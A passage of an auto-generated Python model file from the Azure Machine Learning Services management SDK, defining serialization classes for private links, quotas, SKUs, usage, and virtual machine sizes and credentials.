'private_link_service_connection_state': {'key': 'properties.privateLinkServiceConnectionState', 'type': 'PrivateLinkServiceConnectionState'},
'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'},
}
def __init__(
self,
*,
private_endpoint: Optional["PrivateEndpoint"] = None,
private_link_service_connection_state: Optional["PrivateLinkServiceConnectionState"] = None,
**kwargs
):
super(PrivateEndpointConnection, self).__init__(**kwargs)
self.id = None
self.name = None
self.type = None
self.private_endpoint = private_endpoint
self.private_link_service_connection_state = private_link_service_connection_state
self.provisioning_state = None
class PrivateLinkResource(Resource):
"""A private link resource.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Specifies the resource ID.
:vartype id: str
:ivar name: Specifies the name of the resource.
:vartype name: str
:param identity: The identity of the resource.
:type identity: ~azure.mgmt.machinelearningservices.models.Identity
:param location: Specifies the location of the resource.
:type location: str
:ivar type: Specifies the type of the resource.
:vartype type: str
:param tags: A set of tags. Contains resource tags defined as key/value pairs.
:type tags: dict[str, str]
:param sku: The sku of the workspace.
:type sku: ~azure.mgmt.machinelearningservices.models.Sku
:ivar group_id: The private link resource group id.
:vartype group_id: str
:ivar required_members: The private link resource required member names.
:vartype required_members: list[str]
:param required_zone_names: The private link resource Private link DNS zone name.
:type required_zone_names: list[str]
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'group_id': {'readonly': True},
'required_members': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'identity': {'key': 'identity', 'type': 'Identity'},
'location': {'key': 'location', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'tags': {'key': 'tags', 'type': '{str}'},
'sku': {'key': 'sku', 'type': 'Sku'},
'group_id': {'key': 'properties.groupId', 'type': 'str'},
'required_members': {'key': 'properties.requiredMembers', 'type': '[str]'},
'required_zone_names': {'key': 'properties.requiredZoneNames', 'type': '[str]'},
}
def __init__(
self,
*,
identity: Optional["Identity"] = None,
location: Optional[str] = None,
tags: Optional[Dict[str, str]] = None,
sku: Optional["Sku"] = None,
required_zone_names: Optional[List[str]] = None,
**kwargs
):
super(PrivateLinkResource, self).__init__(identity=identity, location=location, tags=tags, sku=sku, **kwargs)
self.group_id = None
self.required_members = None
self.required_zone_names = required_zone_names
class PrivateLinkResourceListResult(msrest.serialization.Model):
"""A list of private link resources.
:param value: Array of private link resources.
:type value: list[~azure.mgmt.machinelearningservices.models.PrivateLinkResource]
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[PrivateLinkResource]'},
}
def __init__(
self,
*,
value: Optional[List["PrivateLinkResource"]] = None,
**kwargs
):
super(PrivateLinkResourceListResult, self).__init__(**kwargs)
self.value = value
class PrivateLinkServiceConnectionState(msrest.serialization.Model):
"""A collection of information about the state of the connection between service consumer and provider.
:param status: Indicates whether the connection has been Approved/Rejected/Removed by the owner
of the service. Possible values include: "Pending", "Approved", "Rejected", "Disconnected",
"Timeout".
:type status: str or
~azure.mgmt.machinelearningservices.models.PrivateEndpointServiceConnectionStatus
:param description: The reason for approval/rejection of the connection.
:type description: str
:param actions_required: A message indicating if changes on the service provider require any
updates on the consumer.
:type actions_required: str
"""
_attribute_map = {
'status': {'key': 'status', 'type': 'str'},
'description': {'key': 'description', 'type': 'str'},
'actions_required': {'key': 'actionsRequired', 'type': 'str'},
}
def __init__(
self,
*,
status: Optional[Union[str, "PrivateEndpointServiceConnectionStatus"]] = None,
description: Optional[str] = None,
actions_required: Optional[str] = None,
**kwargs
):
super(PrivateLinkServiceConnectionState, self).__init__(**kwargs)
self.status = status
self.description = description
self.actions_required = actions_required
class QuotaBaseProperties(msrest.serialization.Model):
"""The properties for Quota update or retrieval.
:param id: Specifies the resource ID.
:type id: str
:param type: Specifies the resource type.
:type type: str
:param limit: The maximum permitted quota of the resource.
:type limit: long
:param unit: An enum describing the unit of quota measurement. Possible values include:
"Count".
:type unit: str or ~azure.mgmt.machinelearningservices.models.QuotaUnit
"""
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'limit': {'key': 'limit', 'type': 'long'},
'unit': {'key': 'unit', 'type': 'str'},
}
def __init__(
self,
*,
id: Optional[str] = None,
type: Optional[str] = None,
limit: Optional[int] = None,
unit: Optional[Union[str, "QuotaUnit"]] = None,
**kwargs
):
super(QuotaBaseProperties, self).__init__(**kwargs)
self.id = id
self.type = type
self.limit = limit
self.unit = unit
class QuotaUpdateParameters(msrest.serialization.Model):
"""Quota update parameters.
:param value: The list for update quota.
:type value: list[~azure.mgmt.machinelearningservices.models.QuotaBaseProperties]
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[QuotaBaseProperties]'},
}
def __init__(
self,
*,
value: Optional[List["QuotaBaseProperties"]] = None,
**kwargs
):
super(QuotaUpdateParameters, self).__init__(**kwargs)
self.value = value
class RegistryListCredentialsResult(msrest.serialization.Model):
"""RegistryListCredentialsResult.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar location:
:vartype location: str
:ivar username:
:vartype username: str
:param passwords:
:type passwords: list[~azure.mgmt.machinelearningservices.models.Password]
"""
_validation = {
'location': {'readonly': True},
'username': {'readonly': True},
}
_attribute_map = {
'location': {'key': 'location', 'type': 'str'},
'username': {'key': 'username', 'type': 'str'},
'passwords': {'key': 'passwords', 'type': '[Password]'},
}
def __init__(
self,
*,
passwords: Optional[List["Password"]] = None,
**kwargs
):
super(RegistryListCredentialsResult, self).__init__(**kwargs)
self.location = None
self.username = None
self.passwords = passwords
class ResourceId(msrest.serialization.Model):
"""Represents a resource ID. For example, for a subnet, it is the resource URL for the subnet.
All required parameters must be populated in order to send to Azure.
:param id: Required. The ID of the resource.
:type id: str
"""
_validation = {
'id': {'required': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
}
def __init__(
self,
*,
id: str,
**kwargs
):
super(ResourceId, self).__init__(**kwargs)
self.id = id
class ResourceName(msrest.serialization.Model):
"""The Resource Name.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar value: The name of the resource.
:vartype value: str
:ivar localized_value: The localized name of the resource.
:vartype localized_value: str
"""
_validation = {
'value': {'readonly': True},
'localized_value': {'readonly': True},
}
_attribute_map = {
'value': {'key': 'value', 'type': 'str'},
'localized_value': {'key': 'localizedValue', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(ResourceName, self).__init__(**kwargs)
self.value = None
self.localized_value = None
class ResourceQuota(msrest.serialization.Model):
"""The quota assigned to a resource.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Specifies the resource ID.
:vartype id: str
:ivar type: Specifies the resource type.
:vartype type: str
:ivar name: Name of the resource.
:vartype name: ~azure.mgmt.machinelearningservices.models.ResourceName
:ivar limit: The maximum permitted quota of the resource.
:vartype limit: long
:ivar unit: An enum describing the unit of quota measurement. Possible values include: "Count".
:vartype unit: str or ~azure.mgmt.machinelearningservices.models.QuotaUnit
"""
_validation = {
'id': {'readonly': True},
'type': {'readonly': True},
'name': {'readonly': True},
'limit': {'readonly': True},
'unit': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'name': {'key': 'name', 'type': 'ResourceName'},
'limit': {'key': 'limit', 'type': 'long'},
'unit': {'key': 'unit', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(ResourceQuota, self).__init__(**kwargs)
self.id = None
self.type = None
self.name = None
self.limit = None
self.unit = None
class ResourceSkuLocationInfo(msrest.serialization.Model):
"""ResourceSkuLocationInfo.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar location: Location of the SKU.
:vartype location: str
:ivar zones: List of availability zones where the SKU is supported.
:vartype zones: list[str]
:ivar zone_details: Details of capabilities available to a SKU in specific zones.
:vartype zone_details: list[~azure.mgmt.machinelearningservices.models.ResourceSkuZoneDetails]
"""
_validation = {
'location': {'readonly': True},
'zones': {'readonly': True},
'zone_details': {'readonly': True},
}
_attribute_map = {
'location': {'key': 'location', 'type': 'str'},
'zones': {'key': 'zones', 'type': '[str]'},
'zone_details': {'key': 'zoneDetails', 'type': '[ResourceSkuZoneDetails]'},
}
def __init__(
self,
**kwargs
):
super(ResourceSkuLocationInfo, self).__init__(**kwargs)
self.location = None
self.zones = None
self.zone_details = None
class ResourceSkuZoneDetails(msrest.serialization.Model):
"""Describes The zonal capabilities of a SKU.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar name: The set of zones that the SKU is available in with the specified capabilities.
:vartype name: list[str]
:ivar capabilities: A list of capabilities that are available for the SKU in the specified list
of zones.
:vartype capabilities: list[~azure.mgmt.machinelearningservices.models.SKUCapability]
"""
_validation = {
'name': {'readonly': True},
'capabilities': {'readonly': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': '[str]'},
'capabilities': {'key': 'capabilities', 'type': '[SKUCapability]'},
}
def __init__(
self,
**kwargs
):
super(ResourceSkuZoneDetails, self).__init__(**kwargs)
self.name = None
self.capabilities = None
class Restriction(msrest.serialization.Model):
"""The restriction because of which SKU cannot be used.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar type: The type of restrictions. As of now only possible value for this is location.
:vartype type: str
:ivar values: The value of restrictions. If the restriction type is set to location. This would
be different locations where the SKU is restricted.
:vartype values: list[str]
:param reason_code: The reason for the restriction. Possible values include: "NotSpecified",
"NotAvailableForRegion", "NotAvailableForSubscription".
:type reason_code: str or ~azure.mgmt.machinelearningservices.models.ReasonCode
"""
_validation = {
'type': {'readonly': True},
'values': {'readonly': True},
}
_attribute_map = {
'type': {'key': 'type', 'type': 'str'},
'values': {'key': 'values', 'type': '[str]'},
'reason_code': {'key': 'reasonCode', 'type': 'str'},
}
def __init__(
self,
*,
reason_code: Optional[Union[str, "ReasonCode"]] = None,
**kwargs
):
super(Restriction, self).__init__(**kwargs)
self.type = None
self.values = None
self.reason_code = reason_code
class ScaleSettings(msrest.serialization.Model):
"""scale settings for AML Compute.
All required parameters must be populated in order to send to Azure.
:param max_node_count: Required. Max number of nodes to use.
:type max_node_count: int
:param min_node_count: Min number of nodes to use.
:type min_node_count: int
:param node_idle_time_before_scale_down: Node Idle Time before scaling down amlCompute.
:type node_idle_time_before_scale_down: ~datetime.timedelta
"""
_validation = {
'max_node_count': {'required': True},
}
_attribute_map = {
'max_node_count': {'key': 'maxNodeCount', 'type': 'int'},
'min_node_count': {'key': 'minNodeCount', 'type': 'int'},
'node_idle_time_before_scale_down': {'key': 'nodeIdleTimeBeforeScaleDown', 'type': 'duration'},
}
def __init__(
self,
*,
max_node_count: int,
min_node_count: Optional[int] = 0,
node_idle_time_before_scale_down: Optional[datetime.timedelta] = None,
**kwargs
):
super(ScaleSettings, self).__init__(**kwargs)
self.max_node_count = max_node_count
self.min_node_count = min_node_count
self.node_idle_time_before_scale_down = node_idle_time_before_scale_down
class ServicePrincipalCredentials(msrest.serialization.Model):
"""Service principal credentials.
All required parameters must be populated in order to send to Azure.
:param client_id: Required. Client Id.
:type client_id: str
:param client_secret: Required. Client secret.
:type client_secret: str
"""
_validation = {
'client_id': {'required': True},
'client_secret': {'required': True},
}
_attribute_map = {
'client_id': {'key': 'clientId', 'type': 'str'},
'client_secret': {'key': 'clientSecret', 'type': 'str'},
}
def __init__(
self,
*,
client_id: str,
client_secret: str,
**kwargs
):
super(ServicePrincipalCredentials, self).__init__(**kwargs)
self.client_id = client_id
self.client_secret = client_secret
class SharedPrivateLinkResource(msrest.serialization.Model):
"""SharedPrivateLinkResource.
:param name: Unique name of the private link.
:type name: str
:param private_link_resource_id: The resource id that private link links to.
:type private_link_resource_id: str
:param group_id: The private link resource group id.
:type group_id: str
:param request_message: Request message.
:type request_message: str
:param status: Indicates whether the connection has been Approved/Rejected/Removed by the owner
of the service. Possible values include: "Pending", "Approved", "Rejected", "Disconnected",
"Timeout".
:type status: str or
~azure.mgmt.machinelearningservices.models.PrivateEndpointServiceConnectionStatus
"""
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'private_link_resource_id': {'key': 'properties.privateLinkResourceId', 'type': 'str'},
'group_id': {'key': 'properties.groupId', 'type': 'str'},
'request_message': {'key': 'properties.requestMessage', 'type': 'str'},
'status': {'key': 'properties.status', 'type': 'str'},
}
def __init__(
self,
*,
name: Optional[str] = None,
private_link_resource_id: Optional[str] = None,
group_id: Optional[str] = None,
request_message: Optional[str] = None,
status: Optional[Union[str, "PrivateEndpointServiceConnectionStatus"]] = None,
**kwargs
):
super(SharedPrivateLinkResource, self).__init__(**kwargs)
self.name = name
self.private_link_resource_id = private_link_resource_id
self.group_id = group_id
self.request_message = request_message
self.status = status
class Sku(msrest.serialization.Model):
"""Sku of the resource.
:param name: Name of the sku.
:type name: str
:param tier: Tier of the sku like Basic or Enterprise.
:type tier: str
"""
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'tier': {'key': 'tier', 'type': 'str'},
}
def __init__(
self,
*,
name: Optional[str] = None,
tier: Optional[str] = None,
**kwargs
):
super(Sku, self).__init__(**kwargs)
self.name = name
self.tier = tier
class SKUCapability(msrest.serialization.Model):
"""Features/user capabilities associated with the sku.
:param name: Capability/Feature ID.
:type name: str
:param value: Details about the feature/capability.
:type value: str
"""
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'value': {'key': 'value', 'type': 'str'},
}
def __init__(
self,
*,
name: Optional[str] = None,
value: Optional[str] = None,
**kwargs
):
super(SKUCapability, self).__init__(**kwargs)
self.name = name
self.value = value
class SkuListResult(msrest.serialization.Model):
"""List of skus with features.
:param value:
:type value: list[~azure.mgmt.machinelearningservices.models.WorkspaceSku]
:param next_link: The URI to fetch the next page of Workspace Skus. Call ListNext() with this
URI to fetch the next page of Workspace Skus.
:type next_link: str
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[WorkspaceSku]'},
'next_link': {'key': 'nextLink', 'type': 'str'},
}
def __init__(
self,
*,
value: Optional[List["WorkspaceSku"]] = None,
next_link: Optional[str] = None,
**kwargs
):
super(SkuListResult, self).__init__(**kwargs)
self.value = value
self.next_link = next_link
class SkuSettings(msrest.serialization.Model):
"""Describes Workspace Sku details and features.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar locations: The set of locations that the SKU is available. This will be supported and
registered Azure Geo Regions (e.g. West US, East US, Southeast Asia, etc.).
:vartype locations: list[str]
:ivar location_info: A list of locations and availability zones in those locations where the
SKU is available.
:vartype location_info:
list[~azure.mgmt.machinelearningservices.models.ResourceSkuLocationInfo]
:ivar tier: Sku Tier like Basic or Enterprise.
:vartype tier: str
:ivar resource_type:
:vartype resource_type: str
:ivar name:
:vartype name: str
:ivar capabilities: List of features/user capabilities associated with the sku.
:vartype capabilities: list[~azure.mgmt.machinelearningservices.models.SKUCapability]
:param restrictions: The restrictions because of which SKU cannot be used. This is empty if
there are no restrictions.
:type restrictions: list[~azure.mgmt.machinelearningservices.models.Restriction]
"""
_validation = {
'locations': {'readonly': True},
'location_info': {'readonly': True},
'tier': {'readonly': True},
'resource_type': {'readonly': True},
'name': {'readonly': True},
'capabilities': {'readonly': True},
}
_attribute_map = {
'locations': {'key': 'locations', 'type': '[str]'},
'location_info': {'key': 'locationInfo', 'type': '[ResourceSkuLocationInfo]'},
'tier': {'key': 'tier', 'type': 'str'},
'resource_type': {'key': 'resourceType', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'capabilities': {'key': 'capabilities', 'type': '[SKUCapability]'},
'restrictions': {'key': 'restrictions', 'type': '[Restriction]'},
}
def __init__(
self,
*,
restrictions: Optional[List["Restriction"]] = None,
**kwargs
):
super(SkuSettings, self).__init__(**kwargs)
self.locations = None
self.location_info = None
self.tier = None
self.resource_type = None
self.name = None
self.capabilities = None
self.restrictions = restrictions
class SslConfiguration(msrest.serialization.Model):
"""The ssl configuration for scoring.
:param status: Enable or disable ssl for scoring. Possible values include: "Disabled",
"Enabled".
:type status: str or ~azure.mgmt.machinelearningservices.models.SslConfigurationStatus
:param cert: Cert data.
:type cert: str
:param key: Key data.
:type key: str
:param cname: CNAME of the cert.
:type cname: str
"""
_attribute_map = {
'status': {'key': 'status', 'type': 'str'},
'cert': {'key': 'cert', 'type': 'str'},
'key': {'key': 'key', 'type': 'str'},
'cname': {'key': 'cname', 'type': 'str'},
}
def __init__(
self,
*,
status: Optional[Union[str, "SslConfigurationStatus"]] = None,
cert: Optional[str] = None,
key: Optional[str] = None,
cname: Optional[str] = None,
**kwargs
):
super(SslConfiguration, self).__init__(**kwargs)
self.status = status
self.cert = cert
self.key = key
self.cname = cname
class SystemService(msrest.serialization.Model):
"""A system service running on a compute.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar system_service_type: The type of this system service.
:vartype system_service_type: str
:ivar public_ip_address: Public IP address.
:vartype public_ip_address: str
:ivar version: The version for this type.
:vartype version: str
"""
_validation = {
'system_service_type': {'readonly': True},
'public_ip_address': {'readonly': True},
'version': {'readonly': True},
}
_attribute_map = {
'system_service_type': {'key': 'systemServiceType', 'type': 'str'},
'public_ip_address': {'key': 'publicIpAddress', 'type': 'str'},
'version': {'key': 'version', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(SystemService, self).__init__(**kwargs)
self.system_service_type = None
self.public_ip_address = None
self.version = None
class UpdateWorkspaceQuotas(msrest.serialization.Model):
"""The properties for update Quota response.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Specifies the resource ID.
:vartype id: str
:ivar type: Specifies the resource type.
:vartype type: str
:param limit: The maximum permitted quota of the resource.
:type limit: long
:ivar unit: An enum describing the unit of quota measurement. Possible values include: "Count".
:vartype unit: str or ~azure.mgmt.machinelearningservices.models.QuotaUnit
:param status: Status of update workspace quota. Possible values include: "Undefined",
"Success", "Failure", "InvalidQuotaBelowClusterMinimum",
"InvalidQuotaExceedsSubscriptionLimit", "InvalidVMFamilyName", "OperationNotSupportedForSku",
"OperationNotEnabledForRegion".
:type status: str or ~azure.mgmt.machinelearningservices.models.Status
"""
_validation = {
'id': {'readonly': True},
'type': {'readonly': True},
'unit': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'limit': {'key': 'limit', 'type': 'long'},
'unit': {'key': 'unit', 'type': 'str'},
'status': {'key': 'status', 'type': 'str'},
}
def __init__(
self,
*,
limit: Optional[int] = None,
status: Optional[Union[str, "Status"]] = None,
**kwargs
):
super(UpdateWorkspaceQuotas, self).__init__(**kwargs)
self.id = None
self.type = None
self.limit = limit
self.unit = None
self.status = status
class UpdateWorkspaceQuotasResult(msrest.serialization.Model):
"""The result of update workspace quota.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar value: The list of workspace quota update result.
:vartype value: list[~azure.mgmt.machinelearningservices.models.UpdateWorkspaceQuotas]
:ivar next_link: The URI to fetch the next page of workspace quota update result. Call
ListNext() with this to fetch the next page of Workspace Quota update result.
:vartype next_link: str
"""
_validation = {
'value': {'readonly': True},
'next_link': {'readonly': True},
}
_attribute_map = {
'value': {'key': 'value', 'type': '[UpdateWorkspaceQuotas]'},
'next_link': {'key': 'nextLink', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(UpdateWorkspaceQuotasResult, self).__init__(**kwargs)
self.value = None
self.next_link = None
class Usage(msrest.serialization.Model):
"""Describes AML Resource Usage.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Specifies the resource ID.
:vartype id: str
:ivar type: Specifies the resource type.
:vartype type: str
:ivar unit: An enum describing the unit of usage measurement. Possible values include: "Count".
:vartype unit: str or ~azure.mgmt.machinelearningservices.models.UsageUnit
:ivar current_value: The current usage of the resource.
:vartype current_value: long
:ivar limit: The maximum permitted usage of the resource.
:vartype limit: long
:ivar name: The name of the type of usage.
:vartype name: ~azure.mgmt.machinelearningservices.models.UsageName
"""
_validation = {
'id': {'readonly': True},
'type': {'readonly': True},
'unit': {'readonly': True},
'current_value': {'readonly': True},
'limit': {'readonly': True},
'name': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'unit': {'key': 'unit', 'type': 'str'},
'current_value': {'key': 'currentValue', 'type': 'long'},
'limit': {'key': 'limit', 'type': 'long'},
'name': {'key': 'name', 'type': 'UsageName'},
}
def __init__(
self,
**kwargs
):
super(Usage, self).__init__(**kwargs)
self.id = None
self.type = None
self.unit = None
self.current_value = None
self.limit = None
self.name = None
class UsageName(msrest.serialization.Model):
"""The Usage Names.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar value: The name of the resource.
:vartype value: str
:ivar localized_value: The localized name of the resource.
:vartype localized_value: str
"""
_validation = {
'value': {'readonly': True},
'localized_value': {'readonly': True},
}
_attribute_map = {
'value': {'key': 'value', 'type': 'str'},
'localized_value': {'key': 'localizedValue', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(UsageName, self).__init__(**kwargs)
self.value = None
self.localized_value = None
class UserAccountCredentials(msrest.serialization.Model):
"""Settings for user account that gets created on each on the nodes of a compute.
All required parameters must be populated in order to send to Azure.
:param admin_user_name: Required. Name of the administrator user account which can be used to
SSH to nodes.
:type admin_user_name: str
:param admin_user_ssh_public_key: SSH public key of the administrator user account.
:type admin_user_ssh_public_key: str
:param admin_user_password: <PASSWORD>.
:type admin_user_password: str
"""
_validation = {
'admin_user_name': {'required': True},
}
_attribute_map = {
'admin_user_name': {'key': 'adminUserName', 'type': 'str'},
'admin_user_ssh_public_key': {'key': 'adminUserSshPublicKey', 'type': 'str'},
'admin_user_password': {'key': 'adminUserPassword', 'type': 'str'},
}
def __init__(
self,
*,
admin_user_name: str,
admin_user_ssh_public_key: Optional[str] = None,
admin_user_password: Optional[str] = None,
**kwargs
):
super(UserAccountCredentials, self).__init__(**kwargs)
self.admin_user_name = admin_user_name
self.admin_user_ssh_public_key = admin_user_ssh_public_key
self.admin_user_password = <PASSWORD>
class VirtualMachine(Compute):
"""A Machine Learning compute based on Azure Virtual Machines.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:param compute_type: Required. The type of compute.Constant filled by server. Possible values
include: "AKS", "AmlCompute", "ComputeInstance", "DataFactory", "VirtualMachine", "HDInsight",
"Databricks", "DataLakeAnalytics".
:type compute_type: str or ~azure.mgmt.machinelearningservices.models.ComputeType
:param compute_location: Location for the underlying compute.
:type compute_location: str
:ivar provisioning_state: The provision state of the cluster. Valid values are Unknown,
Updating, Provisioning, Succeeded, and Failed. Possible values include: "Unknown", "Updating",
"Creating", "Deleting", "Succeeded", "Failed", "Canceled".
:vartype provisioning_state: str or
~azure.mgmt.machinelearningservices.models.ProvisioningState
:param description: The description of the Machine Learning compute.
:type description: str
:ivar created_on: The date and time when the compute was created.
:vartype created_on: ~datetime.datetime
:ivar modified_on: The date and time when the compute was last modified.
:vartype modified_on: ~datetime.datetime
:param resource_id: ARM resource id of the underlying compute.
:type resource_id: str
:ivar provisioning_errors: Errors during provisioning.
:vartype provisioning_errors:
list[~azure.mgmt.machinelearningservices.models.MachineLearningServiceError]
:ivar is_attached_compute: Indicating whether the compute was provisioned by user and brought
from outside if true, or machine learning service provisioned it if false.
:vartype is_attached_compute: bool
:param properties:
:type properties: ~azure.mgmt.machinelearningservices.models.VirtualMachineProperties
"""
_validation = {
'compute_type': {'required': True},
'provisioning_state': {'readonly': True},
'created_on': {'readonly': True},
'modified_on': {'readonly': True},
'provisioning_errors': {'readonly': True},
'is_attached_compute': {'readonly': True},
}
_attribute_map = {
'compute_type': {'key': 'computeType', 'type': 'str'},
'compute_location': {'key': 'computeLocation', 'type': 'str'},
'provisioning_state': {'key': 'provisioningState', 'type': 'str'},
'description': {'key': 'description', 'type': 'str'},
'created_on': {'key': 'createdOn', 'type': 'iso-8601'},
'modified_on': {'key': 'modifiedOn', 'type': 'iso-8601'},
'resource_id': {'key': 'resourceId', 'type': 'str'},
'provisioning_errors': {'key': 'provisioningErrors', 'type': '[MachineLearningServiceError]'},
'is_attached_compute': {'key': 'isAttachedCompute', 'type': 'bool'},
'properties': {'key': 'properties', 'type': 'VirtualMachineProperties'},
}
def __init__(
self,
*,
compute_location: Optional[str] = None,
description: Optional[str] = None,
resource_id: Optional[str] = None,
properties: Optional["VirtualMachineProperties"] = None,
**kwargs
):
super(VirtualMachine, self).__init__(compute_location=compute_location, description=description, resource_id=resource_id, **kwargs)
self.compute_type = 'VirtualMachine' # type: str
self.properties = properties
class VirtualMachineProperties(msrest.serialization.Model):
"""VirtualMachineProperties.
:param virtual_machine_size: Virtual Machine size.
:type virtual_machine_size: str
:param ssh_port: Port open for ssh connections.
:type ssh_port: int
:param address: Public IP address of the virtual machine.
:type address: str
:param administrator_account: Admin credentials for virtual machine.
:type administrator_account:
~azure.mgmt.machinelearningservices.models.VirtualMachineSshCredentials
"""
_attribute_map = {
'virtual_machine_size': {'key': 'virtualMachineSize', 'type': 'str'},
'ssh_port': {'key': 'sshPort', 'type': 'int'},
'address': {'key': 'address', 'type': 'str'},
'administrator_account': {'key': 'administratorAccount', 'type': 'VirtualMachineSshCredentials'},
}
def __init__(
self,
*,
virtual_machine_size: Optional[str] = None,
ssh_port: Optional[int] = None,
address: Optional[str] = None,
administrator_account: Optional["VirtualMachineSshCredentials"] = None,
**kwargs
):
super(VirtualMachineProperties, self).__init__(**kwargs)
self.virtual_machine_size = virtual_machine_size
self.ssh_port = ssh_port
self.address = address
self.administrator_account = administrator_account
class VirtualMachineSecrets(ComputeSecrets):
"""Secrets related to a Machine Learning compute based on AKS.
All required parameters must be populated in order to send to Azure.
:param compute_type: Required. The type of compute.Constant filled by server. Possible values
include: "AKS", "AmlCompute", "ComputeInstance", "DataFactory", "VirtualMachine", "HDInsight",
"Databricks", "DataLakeAnalytics".
:type compute_type: str or ~azure.mgmt.machinelearningservices.models.ComputeType
:param administrator_account: Admin credentials for virtual machine.
:type administrator_account:
~azure.mgmt.machinelearningservices.models.VirtualMachineSshCredentials
"""
_validation = {
'compute_type': {'required': True},
}
_attribute_map = {
'compute_type': {'key': 'computeType', 'type': 'str'},
'administrator_account': {'key': 'administratorAccount', 'type': 'VirtualMachineSshCredentials'},
}
def __init__(
self,
*,
administrator_account: Optional["VirtualMachineSshCredentials"] = None,
**kwargs
):
super(VirtualMachineSecrets, self).__init__(**kwargs)
self.compute_type = 'VirtualMachine' # type: str
self.administrator_account = administrator_account
class VirtualMachineSize(msrest.serialization.Model):
"""Describes the properties of a VM size.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar name: The name of the virtual machine size.
:vartype name: str
:ivar family: The family name of the virtual machine size.
:vartype family: str
:ivar v_cp_us: The number of vCPUs supported by the virtual machine size.
:vartype v_cp_us: int
:ivar gpus: The number of gPUs supported by the virtual machine size.
:vartype gpus: int
:ivar os_vhd_size_mb: The OS VHD disk size, in MB, allowed by the virtual machine size.
:vartype os_vhd_size_mb: int
:ivar max_resource_volume_mb: The resource volume size, in MB, allowed by the virtual machine
size.
:vartype max_resource_volume_mb: int
:ivar memory_gb: The amount of memory, in GB, supported by the virtual machine size.
:vartype memory_gb: float
:ivar low_priority_capable: Specifies if the virtual machine size supports low priority VMs.
:vartype low_priority_capable: bool
:ivar premium_io: Specifies if the virtual machine size supports premium IO.
:vartype premium_io: bool
:param estimated_vm_prices: The estimated price information for using a VM.
:type estimated_vm_prices: ~azure.mgmt.machinelearningservices.models.EstimatedVMPrices
:param supported_compute_types: Specifies the compute types supported by the virtual machine
size.
:type supported_compute_types: list[str]
"""
_validation = {
'name': {'readonly': True},
'family': {'readonly': True},
'v_cp_us': {'readonly': True},
'gpus': {'readonly': True},
'os_vhd_size_mb': {'readonly': True},
'max_resource_volume_mb': {'readonly': True},
'memory_gb': {'readonly': True},
'low_priority_capable': {'readonly': True},
'premium_io': {'readonly': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'family': {'key': 'family', 'type': 'str'},
'v_cp_us': {'key': 'vCPUs', 'type': 'int'},
'gpus': {'key': 'gpus', 'type': 'int'},
'os_vhd_size_mb': {'key': 'osVhdSizeMB', 'type': 'int'},
'max_resource_volume_mb': {'key': 'maxResourceVolumeMB', 'type': 'int'},
'memory_gb': {'key': 'memoryGB', 'type': 'float'},
'low_priority_capable': {'key': 'lowPriorityCapable', 'type': 'bool'},
'premium_io': {'key': 'premiumIO', 'type': 'bool'},
'estimated_vm_prices': {'key': 'estimatedVMPrices', 'type': 'EstimatedVMPrices'},
'supported_compute_types': {'key': 'supportedComputeTypes', 'type': '[str]'},
}
def __init__(
self,
*,
estimated_vm_prices: Optional["EstimatedVMPrices"] = None,
supported_compute_types: Optional[List[str]] = None,
**kwargs
):
super(VirtualMachineSize, self).__init__(**kwargs)
self.name = None
self.family = None
self.v_cp_us = None
self.gpus = None
self.os_vhd_size_mb = None
self.max_resource_volume_mb = None
self.memory_gb = None
self.low_priority_capable = None
self.premium_io = None
self.estimated_vm_prices = estimated_vm_prices
self.supported_compute_types = supported_compute_types
class VirtualMachineSizeListResult(msrest.serialization.Model):
"""The List Virtual Machine size operation response.
:param aml_compute: The list of virtual machine sizes supported by AmlCompute.
:type aml_compute: list[~azure.mgmt.machinelearningservices.models.VirtualMachineSize]
"""
_attribute_map = {
'aml_compute': {'key': 'amlCompute', 'type': '[VirtualMachineSize]'},
}
def __init__(
self,
*,
aml_compute: Optional[List["VirtualMachineSize"]] = None,
**kwargs
):
super(VirtualMachineSizeListResult, self).__init__(**kwargs)
self.aml_compute = aml_compute
class VirtualMachineSshCredentials(msrest.serialization.Model):
"""Admin credentials for virtual machine.
:param username: Username of admin account.
:type username: str
:param password: Password of admin account.
:type password: str
:param public_key_data: Public key data.
:type public_key_data: str
:param private_key_data: Private key data.
